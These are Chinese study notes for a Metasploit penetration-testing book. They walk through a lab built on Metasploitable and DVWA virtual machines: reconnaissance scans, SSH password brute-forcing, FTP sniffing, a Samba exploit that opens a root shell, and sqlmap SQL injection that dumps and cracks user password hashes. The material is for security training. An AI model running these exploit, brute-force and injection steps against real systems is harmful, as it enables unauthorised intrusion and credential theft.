《Metasploit渗透测试魔鬼训练营》学习笔记
Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记|Linux Metasploitable| Linux靶机 |下载vmware虚拟机镜像|WinXP Metasploitable| Windows靶机 |下载vmware虚拟机镜像|OWASP BWA|Web服务器靶机|下载vmware虚拟机镜像|Win2K3 Metasploitable|Windows靶机
Metasploit渗透测试魔鬼训练营学习笔记
法律常识
《中华人民共和国网络安全法》已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布,自2017年6月1日起施行。
第二十条 国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训,采取多种方式培养网络安全人才,促进网络安全人才交流。
第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息,不得非法出售或者非法向他人提供个人信息。
第四十六条 任何个人和组织应当对其使用网络的行为负责,不得设立用于实施诈骗,传授犯罪方法,制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组,不得利用网络发布涉及实施诈骗,制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。
第四十八条 任何个人和组织发送的电子信息、提供的应用软件,不得设置恶意程序,不得含有法律、行政法规禁止发布或者传输的信息。
前言
本篇学习笔记主要涉及《Metasploit渗透测试魔鬼训练营》实验,原理篇见原书和其他文章。因阅读《Metasploit渗透测试魔鬼训练营》时发现有些实验方法与当前年份无法匹配,故撰写该篇学习笔记,如Back Track5已经停止维护现为Kali Linux,Kali Linux虚拟机占用资源远超于Windows应用Kali Linux占用资源等。
环境准备
环境概览
环境名称 | 用途 | 备注 |
---|---|---|
Linux Metasploitable | Linux靶机 | 下载vmware虚拟机镜像 |
WinXP Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |
OWASP BWA | Web服务器靶机 | 下载vmware虚拟机镜像 |
Win2K3 Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |
Kali Linux | Linux攻击机 | 宿主机Windows 10上安装Metasploit/Kali Linux |
环境下载
链接: https://pan.baidu.com/s/1I-OkdUcTwEx-TDoTT29hsw?pwd=rjpi
提取码: rjpi
环境部署
vmware虚拟网络编辑器配置
虽然所有靶机的地址应为DHCP获取,但是为了方便与书中保持一致,还是暂时配置为Static地址
Linux Metasploitable网络配置
vi /etc/network/interfaces
auth l0
iface l0 inet loopback
auto eth0
iface eth0 inet static
address 10.10.10.254
netmask 255.255.255.0
auto eth1
iface eth1 inet static
address 192.168.10.254
netmask 255.255.255.0
ifdown eth0
ifdown eth0
ifup eth0
ifup eth1
WinXP Metasploitable网络配置
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.10.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.254
OWASP BWA网络配置
vi /etc/network/interfaces
auto l0
iface l0 inet loopback
auto eth0
iface eth0 inet static
address 10.10.10.129
netmask 255.255.255.0
gateway 10.10.10.254
ifdown eth0
ifup eth0
Win2K3 Metasploitable网络配置
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.10.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.254
网络配置成功标志
网络配置成功标志为每台设备都能ping通其他的所有地址,若单向能ping通,但双向ping不通可能是主机的防火墙策略拦截,属正常现象
ping 192.168.10.254
ping 10.10.10.254
ping 192.168.10.128
ping 10.10.10.128
ping 10.10.10.129
ping 10.10.10.130
对于环境中的IP均有相关的DNS域名配置信息,配置hosts文件配置对应的IP和域名解析情况
备注:在修改hosts文件前,要将属性中的只读勾选去掉,同时添加Everyone完全控制权限,在修改完成后将只读勾选,同时删除Everyone用户
notepad C:\Windows\System32\drivers\etc\hosts
10.10.10.128 attacker.dvssc.com
10.10.10.129 www.dvssc.com
10.10.10.130 service.dvssc.com
10.10.10.254 gate.dvssc.com
192.168.10.128 intranet1.dvssc.com
Windows 10宿主机安装Metasploit/Kali Linux
下载Metasploit,双击msi文件运行后安装默认位置即可,配置环境变量c:/metasploit-framework
https://windows.metasploit.com/
或者在Windows 10应用商店中下载Kali Linux(亲测Kali Linux因网络配置原因无法使用辅助模块扫描等操作,推荐直接安装Metasploit,使用Kali Linux环境安装其他有且仅能Kali Linux环境安装的应用)
参考链接:
https://zhuanlan.zhihu.com/p/462187821
https://baijiahao.baidu.com/s?id=1689395460377352647&wfr=spider&for=pc
https://blog.csdn.net/qq_44159028/article/details/114635276
初识msfconsole
运行msfconsole
msfconsole
PS C:\Users\IDEA> msfconsole
C:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-:/+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`
=[ metasploit v6.1.38-dev-c252faf9388449dd3af4f0ab1288c0ce82fe4cf9]
+ -- --=[ 2212 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 615 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: To save all commands executed since start up
to a file, use the makerc command
msf6 >
使用msfconsole
msf6 > search samba
msf6 > use multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > show payloads
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
msf6 exploit(multi/samba/usermap_script) > show options
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.254
msf6 exploit(multi/samba/usermap_script) > exploit
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
在MSF终端里看到了“Command shell session 1 opened”的成功信息,这时可以输入一些Shell命令,如uname -a和whoami,来查看所控制的目标主机操作系统类型,以及所拥有的用户账户权限
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:a8:c8:7a brd ff:ff:ff:ff:ff:ff
inet 10.10.10.254/24 brd 10.10.10.255 scope global eth0
inet6 fe80::20c:29ff:fea8:c87a/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:a8:c8:84 brd ff:ff:ff:ff:ff:ff
inet 192.168.10.254/24 brd 192.168.10.255 scope global eth1
inet6 fe80::20c:29ff:fea8:c884/64 scope link
valid_lft forever preferred_lft forever
模拟环境渗透测试
以下环节摒除正规渗透测试环境中的项目管理内容等,仅单纯利用Metasploit的各类模块对模拟环境进行渗透测试。
modules
├─auxiliary # 辅助模块
├─encoders # 编码工具模块
├─evasion # 混淆模块
├─exploits # 渗 透模块
├─nops # 空模块
├─payloads # 攻击载荷模块
└─post # 后期渗透模块
情报搜集
Metasploit为渗透测试的信息搜集环境提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录口令、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
Metasploit位于情报搜集阶段主要利用auxiliary(辅助模块)。
auxiliary(辅助模块):包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。
nslookup查询域名解析情况
msf6 > nslookup www.dvssc.com
[*] exec: nslookup www.dvssc.com
服务器: RTK_GW.bbrouter
Address: 192.168.1.1
非权威应答:
名称: hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
Addresses: 54.209.32.212
52.71.57.184
Aliases: www.dvssc.com
traff-1.hugedomains.com
whois
https://whois.chinaz.com/
使用dir_scanner辅助模块搜索网站目录
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts www.dvssc.com
rhosts => www.dvssc.com
msf6 auxiliary(scanner/http/dir_scanner) > exploit
[-] Warning: The Windows platform cannot reliably support more than 16 threads
[-] Thread count has been adjusted to 16
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+][+][+][+][+] Found http://www.dvssc.com:80/001/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/1/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/3/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/0001/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/0/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/00001/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/1000/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/11/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/111/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/10/ 503 (10.10.10.129)
[+][+][+][+][+] Found http://www.dvssc.com:80/04/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/123/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/1111/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/007/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/123321/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/123123/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/1337/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/2/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/777/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/6/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/5/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/666/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/8/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/7/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/606/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/4/ 503 (10.10.10.129)
[+][+] Found http://www.dvssc.com:80/911911/ 503 (10.10.10.129)
Found http://www.dvssc.com:80/9/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/administrator/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cache/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cgi-bin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/components/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/css/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/doc/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/f/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/gallery2/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/ghost/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/icons/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/images/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/includes/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/installation/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/javascript/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/js/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/libraries/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/language/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/login/ 500 (10.10.10.129)
[+] Found http://www.dvssc.com:80/logs/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/media/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/modules/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/plugins/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/templates/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/tmp/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/wordpress/ 200 (10.10.10.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/dir_scanner) >
使用arp_sweep模块探查活跃主机
msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run
在MSF终端中运行Nmap扫描工具
msf6 > nmap 10.10.10.0/24
使用Nmap进行活跃主机探则
msf6 > nmap -Pn 10.10.10.0/24
使用Nmap探测目标主机的操作系统版本
msf6 > nmap -O 10.10.10.0/24
Telnet服务扫描
msf6 > use auxiliary/scanner/telnet/telnet_version
msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/telnet/telnet_version) > set threads 100
msf6 auxiliary(scanner/telnet/telnet_version) > run
SSH服务扫描
search ssh_version
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 100
msf6 auxiliary(scanner/ssh/ssh_version) > run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set RPORT 22
set STOP_ON_SUCCESS false
set BLANK_PASSWORDS true
set USER_FILE "c:\resource\user.txt"
set PASS_FILE "c:\resource\pass.txt"
Oracle服务扫描
msf6 > use auxiliary/scanner/oracle/tnslsnr_version
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set threads 50
msf6 auxiliary(scanner/oracle/tnslsnr_version) > run
SSH服务弱口令探测
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.254
msf6 auxiliary(scanner/ssh/ssh_login) > set uesrname root
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/words.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set thread 50
msf6 auxiliary(scanner/ssh/ssh_login) > run
通过嗅探获取FTP用户名和口令
msf6 > use auxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > run
Nessus网络漏洞扫描
详情阅读另一篇CentOS Docker环境部署Nessus
渗透攻击
Metasploit利用目标系统安全漏洞入侵系统并获得访问控制权。Metasploit位于渗透攻击阶段主要利用exploit(渗透模块)、payload(安全载荷模块)。
exploit(渗透模块):是一段程序,运行时会利用目标的安全漏洞进行安全测试。
payload(安全载荷模块):在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。
Web应用渗透
SQL注入
Sqlmap扫描
Metasploit中没有Sqlmap模块了,需要直接安装Sqlmap
python3直接在Windows10应用商店中安装
https://sqlmap.org/
下载解压重命名为sqlmap放置到c目录下python c:/sqlmap/sqlmap.py+参数直接执行
http://10.10.10.129/dvwa/login.php
uesrname:admin
password:admin
选择Damn Vulnerable Web Application
设置DVWA Security为low
选择SQL Injection
python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
___
__H__
___ ___[)]_____ ___ ___ {1.6.4.4#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:21:13 /2022-04-14/
[21:21:14] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q]
[21:21:15] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow? [Y/n]
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9547p2gdpmv...u0t9jme0i1;security=high;security=high'). Do you want to use those [Y/n]
[21:21:17] [INFO] testing if the target URL content is stable
[21:21:17] [WARNING] URI parameter '#1*' does not appear to be dynamic
[21:21:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[21:21:17] [INFO] testing for SQL injection on URI parameter '#1*'
[21:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:21:17] [WARNING] reflective value(s) found and filtering out
[21:21:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:21:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:21:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:21:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:21:17] [INFO] testing 'Generic inline queries'
[21:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:21:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:21:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:21:18] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[21:21:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:21:19] [WARNING] URI parameter '#1*' does not seem to be injectable
[21:21:19] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:21:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 72 times
[*] ending @ 21:21:19 /2022-04-14/
Sqlmap提示信息,它还是希望我们对于GET请求或POST请求提供参数,故添加参数
you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself?
Sqlmap提示信息,它表示在测试过程会302重定向到登录界面,故添加Cookie保持登录状态
testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow?
Sqlmap提示信息,它表示暂时没有发现注入点,是否要减少请求数量
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?
打开F12调试器刷新界面点击任意请求查看Cookie信息
python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
___
__H__
___ ___[.]_____ ___ ___ {1.6.4.4#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:47:37 /2022-04-14/
[21:47:37] [INFO] resuming back-end DBMS 'mysql'
[21:47:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 8674=8674#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:47:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:47:37] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
[*] ending @ 21:47:37 /2022-04-14/
Sqlmap提示信息,数据库为MySQL数据库
resuming back-end DBMS 'mysql'
Sqlmap提示信息,注入点为Parameter: id (GET)
Parameter: id (GET)
Sqlmap提示信息,SQL注入类型为Boolean注入、报错注入、时间注入、Union注入
Type: boolean-based blind
Type: error-based
Type: time-based blind
Type: UNION query
Sqlmap提示信息,payload
Payload: id=1' OR NOT 8674=8674#&Submit=Submit
Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
添加dump参数获取数据库数据,测试环境数据量小能够直接dump,数据量大要逐步查询数据库database、数据表table、数据字段columns、数据data,分别使用参数dbs、tables、columns、dump
python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
___
__H__
___ ___["]_____ ___ ___ {1.6.4.4#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:57:58 /2022-04-14/
[21:57:58] [INFO] resuming back-end DBMS 'mysql'
[21:57:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=1' OR NOT 8674=8674#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:57:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
[21:57:58] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:57:58] [INFO] fetching current database
[21:57:58] [INFO] fetching tables for database: 'dvwa'
[21:57:58] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
[21:57:58] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[21:57:58] [INFO] table 'dvwa.guestbook' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\guestbook.csv'
[21:57:58] [INFO] fetching columns for table 'users' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'users' in database 'dvwa'
[21:57:58] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:58:04] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:58:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:58:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:58:05] [INFO] starting 8 processes
[' for hash '21:58:11e99a18c428cb38d5f260853678922e03] ['
[21:58:1321:58:13] [] [INFOINFO] cracked password '] current status: BCfNi... /charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[21:58:16] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
['NFO21:58:17] cracked password '] [INFOletmein] current status: bab12... -' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[password21:58:19' for hash '] [5f4dcc3b5aa765d61d8327deb882cf99INFO'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| 1 | admin | http://owaspbwa/dvwa/hackable/users/admin.jpg | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin | admin |
| 2 | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
